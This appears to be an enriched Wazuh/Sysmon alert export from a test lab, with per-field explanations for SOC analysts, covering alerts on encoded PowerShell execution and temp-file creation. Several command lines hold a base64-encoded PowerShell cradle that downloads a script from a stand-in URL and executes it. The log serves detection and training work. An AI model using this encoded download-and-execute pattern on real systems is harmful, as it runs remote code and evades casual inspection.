data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:27.447+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:27.447+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  70
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534307.1617777
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:25.2469858Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284576
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:23.806 ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} ProcessId: 16016 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} ParentProcessId: 15900 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:23.806
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5f-680a-740b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16016
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd5c-680a-720b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:27.462+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:27.462+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  74
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534307.1625848
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:25.4788727Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284577
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:25.438 ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} ProcessId: 16016 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tvke0fdg.nch.ps1 CreationUtcTime: 2025-04-24 22:38:25.438 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:25.438
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5f-680a-740b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16016
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tvke0fdg.nch.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:25.438
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:30.562+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:30.562+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  71
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534310.1628617
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:27.9090694Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284623
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:26.606 ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} ProcessId: 16188 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} ParentProcessId: 16016 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:26.606
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd62-680a-760b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd5f-680a-740b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16016
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:30.567+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:30.567+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  75
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534310.1636688
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:28.2206040Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284624
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:28.201 ProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} ProcessId: 16188 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zwznofro.2cu.ps1 CreationUtcTime: 2025-04-24 22:38:28.201 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:28.201
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd62-680a-760b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zwznofro.2cu.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:28.201
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

